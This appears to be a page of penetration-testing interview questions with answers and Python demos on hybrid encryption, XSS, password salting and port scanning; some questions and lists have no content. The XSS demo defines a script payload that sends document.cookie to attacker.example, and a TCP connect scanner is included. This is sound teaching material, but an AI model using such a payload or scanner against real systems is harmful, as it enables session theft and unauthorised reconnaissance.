
VAPT Interview Questions

1. What is a specific definition of pentesting?

Penetration testing is an authorized and controlled security assessment in which ethical hackers simulate real-world cyberattacks on systems, networks, or applications to identify vulnerabilities that could be exploited by malicious attackers.

2. What is the primary purpose of pentesting?

The primary purpose of a pentest is to find the weaknesses an attacker could actually exploit and to demonstrate their real impact, within an agreed scope and rules of engagement, so that they can be fixed before a real attacker finds them. The goal is not simply to break in by any means at the outset: a tester normally works up from reconnaissance to initial access, then escalates privileges and pivots through the environment, documenting each step so the client understands how far an attacker could get and why.

3. What are the goals of conducting a pentesting exercise?

4.There is very often confusion between vulnerability testing and pentesting. What is the primary difference between the two?

5. What are the teams that can carry out a pentest? Describe them.

A penetration test is carried out by a Red Team, which may be an internal group or an external firm. The Blue Team is the defensive side: the security operations, detection and response staff whose controls are being tested, and who are sometimes not told that the test is happening. A Purple Team is less a separate group than a way of working in which red and blue collaborate in real time, with the attackers sharing each technique as they run it so the defenders can tune their detections on the spot. Only the red team actually performs the attack; the other two exist to measure and improve the defence.

6. What’s the difference between symmetric and asymmetric encryption?

Symmetric encryption uses the same key to encrypt and decrypt (AES, ChaCha20); asymmetric encryption uses a key pair, so what is encrypted with the public key can only be decrypted with the matching private key (RSA, elliptic-curve schemes). Symmetric ciphers are orders of magnitude faster, but both parties must already share the same secret key, and that key cannot be sent safely over an untrusted channel. Asymmetric cryptography solves the key-distribution problem but is far too slow for bulk data. In practice the two are combined: an asymmetric key exchange (or encryption of a random key under the recipient's public key) establishes a shared secret, and a symmetric cipher derived from it protects the actual traffic. This hybrid design is what TLS, SSH and PGP all do.
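The hybrid pattern described above, as an added example written for this page (not code from the original article): two parties agree a shared secret with Diffie-Hellman, the asymmetric step, derive symmetric keys from it with HKDF, and then encrypt and authenticate the bulk message symmetrically. The modulus is assumed to be RFC 3526 group 14, transcribed by hand, and the stream cipher built from HMAC in counter mode is a demonstration construction standing in for AES-GCM or ChaCha20-Poly1305; neither should be reused as production crypto.

```python
import hashlib
import hmac
import os
import secrets

# Assumption: this modulus is the 2048-bit MODP group (group 14) from RFC 3526,
# transcribed by hand for this example. Verify it against the RFC before reuse.
P = int("".join("""
FFFFFFFF FFFFFFFF C90FDAA2 2168C234 C4C6628B 80DC1CD1 29024E08 8A67CC74
020BBEA6 3B139B22 514A0879 8E3404DD EF9519B3 CD3A431B 302B0A6D F25F1437
4FE1356D 6D51C245 E485B576 625E7EC6 F44C42E9 A637ED6B 0BFF5CB6 F406B7ED
EE386BFB 5A899FA5 AE9F2411 7C4B1FE6 49286651 ECE45B3D C2007CB8 A163BF05
98DA4836 1C55D39A 69163FA8 FD24CF5F 83655D23 DCA3AD96 1C62F356 208552BB
9ED52907 7096966D 670C354E 4ABC9804 F1746C08 CA18217C 32905E46 2E36CE3B
E39E772C 180E8603 9B2783A2 EC07A28F B5C55DF0 6F4C52C9 DE2BCBF6 95581718
3995497C EA956AE5 15D22618 98FA0510 15728E5A 8AACAA68 FFFFFFFF FFFFFFFF
""".split()), 16)
G = 2


def dh_keypair():
    """Asymmetric part: a secret exponent and the public value g^x mod p."""
    x = secrets.randbelow(P - 2) + 1      # private key; never leaves this party
    return x, pow(G, x, P)


def dh_shared_secret(private, peer_public):
    """Both sides compute the same number; an eavesdropper who saw only the
    two public values cannot (discrete logarithm problem)."""
    if not 1 < peer_public < P - 1:       # reject degenerate public values
        raise ValueError("invalid peer public value")
    return pow(peer_public, private, P)


def derive_keys(shared, info=b"demo hybrid v1", length=64):
    """HKDF-SHA256 (RFC 5869) written out: extract a PRK from the raw shared
    number, then expand it into separate encryption and MAC keys."""
    ikm = shared.to_bytes((P.bit_length() + 7) // 8, "big")
    prk = hmac.new(b"\x00" * 32, ikm, hashlib.sha256).digest()
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]


def _keystream(key, nonce, length):
    # Demonstration stream cipher: HMAC-SHA256 in counter mode as the PRF.
    # A real system uses AES-GCM or ChaCha20-Poly1305 from a vetted library.
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def sym_encrypt(keys, plaintext):
    """Symmetric part: the same keys encrypt and decrypt. Encrypt-then-MAC."""
    enc_key, mac_key = keys[:32], keys[32:]
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def sym_decrypt(keys, blob):
    enc_key, mac_key = keys[:32], keys[32:]
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: ciphertext was modified")
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, nonce, len(ct))))


def hybrid_session(message):
    """One full exchange: asymmetric agreement first, then symmetric traffic.
    Returns (keys_matched, decrypted_message)."""
    client_priv, client_pub = dh_keypair()
    server_priv, server_pub = dh_keypair()
    # client_pub and server_pub cross the wire in the clear
    client_keys = derive_keys(dh_shared_secret(client_priv, server_pub))
    server_keys = derive_keys(dh_shared_secret(server_priv, client_pub))
    blob = sym_encrypt(client_keys, message)      # fast path for bulk data
    return client_keys == server_keys, sym_decrypt(server_keys, blob)


if __name__ == "__main__":
    matched, text = hybrid_session(b"the quick brown fox")
    print(matched, text)
```

Note what this exchange does not do: the Diffie-Hellman values are unauthenticated, so an active attacker could run two separate exchanges, one with each side, and read everything. That is why TLS signs the key exchange with the server's certificate; the asymmetric step must authenticate as well as agree a key.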

7. What is SSL and why is it not enough when it comes to encryption?

SSL, and its successor TLS, is the protocol that protects data in transit: it authenticates the server (and optionally the client) through certificates, encrypts the traffic, and checks its integrity. Every version of SSL is deprecated, and TLS 1.2 or 1.3 should be used instead. It is not enough on its own for several reasons. It only protects the connection between two endpoints, so the data is in the clear before encryption, after decryption, and wherever it is stored on the server. Because almost everyone uses it, it is a prime target: implementation bugs such as Heartbleed in OpenSSL, weak configurations (old protocol versions, weak cipher suites, bad certificate validation), and attacks such as SSL stripping, where a man-in-the-middle downgrades the user's connection to plain HTTP on a site that does not enforce HTTPS (HSTS is the defence). TLS should therefore be treated as one layer, with separate protection for data at rest and, where it matters, end-to-end or application-level encryption on top.

8. What is XSS?

Cross-site scripting (XSS) is a web vulnerability in which attacker-controlled input is written into a page without proper encoding, so the victim's browser runs it as script in the context of the trusted site. It lets the attacker steal session cookies or tokens, perform actions as the logged-in user, or alter the page. The three usual forms are reflected (a payload in the request is echoed straight back), stored (the payload is saved, for example in a comment, and served to every visitor) and DOM-based (client-side JavaScript writes untrusted data into the DOM). The primary defence is context-aware output encoding, escaping data for the HTML, attribute, JavaScript or URL context it is inserted into; input validation and a Content Security Policy are useful additional layers but do not replace encoding.
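The vulnerable and hardened forms side by side, as an added example for this page (not from the original article). The server-side rendering is done in Python with html.escape; the attacker inputs are constructed for the demonstration, not taken from any real site. The audit helper parses the rendered HTML the way a browser would and reports whether the input ended up as a script element or an on* handler, which also shows the caveat that escaping alone does not save an unquoted attribute.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs, e.g. the value of a ?name= parameter on a
# reflected-XSS target. Not taken from any real site.
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
UNQUOTED_ATTR_PAYLOAD = "x onmouseover=alert(1)"


def render_unsafe(name):
    """Vulnerable: untrusted data concatenated straight into the HTML body."""
    return "<p>Hello, " + name + "</p>"


def render_safe(name):
    """Hardened: HTML-encode for the element-body context before inserting."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_attr_quoted(name):
    """Attribute context, quoted: escaping the quotes keeps the value contained."""
    return '<input name="user" value="' + html.escape(name, quote=True) + '">'


def render_attr_unquoted(name):
    """Still vulnerable despite escaping: without quotes, the first space ends
    the attribute value and the rest becomes new attributes."""
    return "<input name=user value=" + html.escape(name, quote=True) + ">"


class _DomAudit(HTMLParser):
    """Parse the way a browser would and note anything that executes."""

    def __init__(self):
        super().__init__()
        self.script_elements = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_elements += 1
        self.event_handlers.extend(
            (tag, attr) for attr, _ in attrs if attr.startswith("on")
        )


def payload_executes(rendered_html):
    """True if the parsed page contains a script element or an on* handler,
    i.e. the input became code rather than staying text."""
    audit = _DomAudit()
    audit.feed(rendered_html)
    audit.close()
    return audit.script_elements > 0 or bool(audit.event_handlers)


if __name__ == "__main__":
    for renderer in (render_unsafe, render_safe):
        print(renderer.__name__, payload_executes(renderer(SCRIPT_PAYLOAD)))
    for renderer in (render_attr_quoted, render_attr_unquoted):
        print(renderer.__name__, payload_executes(renderer(UNQUOTED_ATTR_PAYLOAD)))
```

The attribute case is the one to remember in an interview: html.escape turns the second payload into nothing different, because it contains no special characters, so only the quoting of the attribute decides whether "onmouseover" is part of the value or a new attribute.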

9. What are salted hashes?

A salt is random data generated freshly for each password and mixed into the hash computation. When a properly designed system receives a new password it creates a random salt, computes a hash of the salt and the password together using a deliberately slow algorithm such as bcrypt, scrypt, Argon2 or PBKDF2, and stores the salt alongside the resulting hash; the salt itself does not need to be secret. Salting defeats precomputed dictionary and rainbow-table attacks, because the attacker would need a separate table for every salt, and it guarantees that two users with the same password, or the same user on two systems, end up with different stored hashes. Without a salt, anyone who obtains the database can spot reused passwords at a glance and crack all of them with a single lookup.
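The two storage schemes compared, as an added example for this page (not code from the original article): an unsalted SHA-256 that makes reused passwords visible, beside a PBKDF2-HMAC-SHA256 record with a per-password salt, the parameters stored next to the hash, and a constant-time verify. The iteration count is an assumption taken from the order of magnitude the OWASP Password Storage Cheat Sheet recommended for PBKDF2-SHA256 in 2023; the sample passwords are constructed.

```python
import hashlib
import hmac
import os

# Assumed work factor: in the range OWASP recommended for PBKDF2-HMAC-SHA256
# in 2023. Tune so one hash takes a noticeable fraction of a second.
ITERATIONS = 600_000


def unsalted_hash(password):
    """What a naive system stores. Same password, same hash, every time."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_record(password, iterations=ITERATIONS):
    """Create the stored record for a new password: a fresh random salt,
    the slow salted hash, and the parameters needed to recompute it."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {
        "alg": "pbkdf2-sha256",
        "iterations": iterations,
        "salt": salt.hex(),      # stored in the clear next to the hash
        "hash": digest.hex(),
    }


def verify(record, candidate):
    """Recompute with the stored salt and parameters; constant-time compare
    so the comparison itself does not leak how many bytes matched."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


def hashes_collide(hashes):
    """Attacker's view of a dumped table: are any two stored hashes equal?
    With unsalted hashes that reveals shared passwords; with salts it never happens."""
    return len(hashes) != len(set(hashes))


if __name__ == "__main__":
    # Constructed sample: two users who chose the same password.
    pw = "Summer2024!"
    print("unsalted collide:", hashes_collide([unsalted_hash(pw), unsalted_hash(pw)]))
    a, b = make_record(pw), make_record(pw)
    print("salted collide:", hashes_collide([a["hash"], b["hash"]]))
    print("login ok:", verify(a, pw), "wrong pw:", verify(a, "summer2024!"))
```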

10. What is data protection in transit vs data protection at rest?

Data at rest is data stored on disk, in a database, in backups or in object storage; data in transit is data moving over a network, for example between a browser and a server or between two services. The two face different threats and use different controls. At rest, the risk is a stolen disk, a leaked backup or an attacker reading files, addressed with full-disk or volume encryption, database encryption and properly managed keys. In transit, the risk is interception or tampering on the wire, addressed with TLS, SSH or a VPN. One does not substitute for the other: a TLS connection delivers the data in plaintext to a server that may store it unencrypted, and an encrypted disk does nothing for traffic leaving the machine. The extra CPU cost of doing both is small on modern hardware, and both should be done.

11. How do you protect your home wireless access point?

This is partly an opinion question, but some answers are better than others. The measures that actually matter are: use WPA3, or WPA2 with AES/CCMP, together with a long random passphrase; disable WPS, whose PIN can be brute-forced; change the router's default administrator password and turn off remote management; keep the firmware updated; and put guests and IoT devices on a separate network. Two measures that are often mentioned, hiding the SSID and MAC-address filtering, add almost nothing: the SSID still appears in probe and association frames, and MAC addresses are transmitted in the clear and can be spoofed in seconds by anyone sniffing the channel.

12. What is the CIA triangle?

Confidentiality, integrity, availability, more commonly called the CIA triad. It is as close to a core definition of information security as there is. Confidentiality means data is readable only by those authorised to read it; integrity means data cannot be altered or destroyed without authorisation, and that any alteration can be detected; availability means data and systems are accessible to authorised users when they need them. Most security controls, and most attacks, map to one or more of these three properties.

13. What’s the difference between a white box test and a black box test?

The difference is how much information the person commissioning the test gives the testers. In a white box test the team receives as much as possible: architecture diagrams, source code, credentials, network ranges. In a black box test they start with little more than the target's name, as an external attacker would, and must discover everything themselves. A grey box test sits between the two, for example giving the testers an ordinary user account but no internal documentation. White box finds more per hour of testing; black box is the more realistic simulation.

14. What is the chain of custody?

Chain of custody is the documented record of who collected, handled, transferred and stored a piece of evidence, when, and why, from the moment it is seized until it is presented in court. The evidence must be shown to have remained unaltered: in practice that means imaging media through a write blocker, recording cryptographic hashes of the image at acquisition and at every hand-off, and logging each person who had access and for how long. Any gap or unexplained change can get the evidence ruled inadmissible and undermines the credibility of the whole investigation.

15. What is exfiltration?

Infiltration is getting into a target; exfiltration is the opposite: getting sensitive data (or physical items) out without being detected. In a physical test this might mean walking out with documents or a device, for instance while posing as a delivery worker; in a network intrusion it is the stage where the attacker moves the collected data to systems they control, usually disguised as normal traffic such as HTTPS uploads, DNS queries or transfers to a cloud storage service. Well-defended environments monitor outbound traffic, apply data loss prevention and alert on unusual volumes or destinations, which makes exfiltration harder but rarely impossible.

16. What are the hacking stages? Explain each stage

Attacking a specific target typically proceeds through the following five phases:

17. What is scanning and what are some examples of the types of scanning used?

Scanning is the set of procedures for identifying live hosts, open ports, and the services and versions listening on them across a target network. It is a core part of information gathering: it turns the broad picture obtained during footprinting into a concrete inventory of the organisation's exposed systems, which the tester then probes for weaknesses. Types of scanning include:
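A minimal port and service scanner, as an added example for this page (not code from the original article and not a substitute for nmap). It performs a TCP connect scan, the noisiest but simplest kind, since it needs no raw sockets, and grabs the banner an open service sends first, which is the basis of service identification. To run offline it starts its own stand-in service on a random localhost port; the banner string and the service-guessing rules are constructed for the demonstration.

```python
import socket
import threading


def start_demo_service(banner=b"SSH-2.0-demo-service\r\n"):
    """Constructed stand-in for a real service: listens on a random localhost
    port and greets each connection with a banner, as sshd or an SMTP server do."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed, stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def connect_scan(host, port, timeout=0.5):
    """TCP connect scan of one port: completes the full handshake (so it shows
    up in the target's logs) and reads the first bytes the service sends.
    Returns None for closed or filtered, a banner string (maybe empty) for open."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:              # refused, timed out, unreachable
            return None
        try:
            return s.recv(256).decode("ascii", errors="replace").strip()
        except OSError:
            return ""                # open, but the service waits for the client to speak


def guess_service(banner):
    """Tiny version of what service detection does with a banner (constructed rules)."""
    if banner.startswith("SSH-"):
        return "ssh"
    if banner.startswith("220 "):
        return "smtp/ftp"
    return "unknown"


def scan_range(host, ports):
    """Map each open port to (banner, guessed service)."""
    found = {}
    for port in ports:
        banner = connect_scan(host, port)
        if banner is not None:
            found[port] = (banner, guess_service(banner))
    return found


if __name__ == "__main__":
    listener, port = start_demo_service()
    print(scan_range("127.0.0.1", range(port - 3, port + 4)))
    listener.close()
```

A connect scan completes the three-way handshake on every open port, which is why it is easy to spot in logs; a SYN scan (nmap -sS) sends only the first packet and needs raw-socket privileges. Scanning a network you are not authorised to test is illegal in most jurisdictions, so keep this to hosts inside the engagement's scope.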

18. What is footprinting? What are the techniques used for footprinting?

Footprinting is the first phase of an assessment: gathering as much information as possible about the target organisation and its network, largely from public sources, before attempting to gain access. Footprinting techniques include:

19. What are some of the standard tools used by ethical hackers?

To automate routine tasks and speed up an assessment, ethical hackers rely on tools such as:

20. What is Burp Suite? What tools does it contain?

Burp Suite is an integrated platform for testing web applications. It sits as an intercepting proxy between the browser and the target, so the tester can inspect and modify every request and response, and it bundles the tools needed for most of a web application assessment. Its main components include:
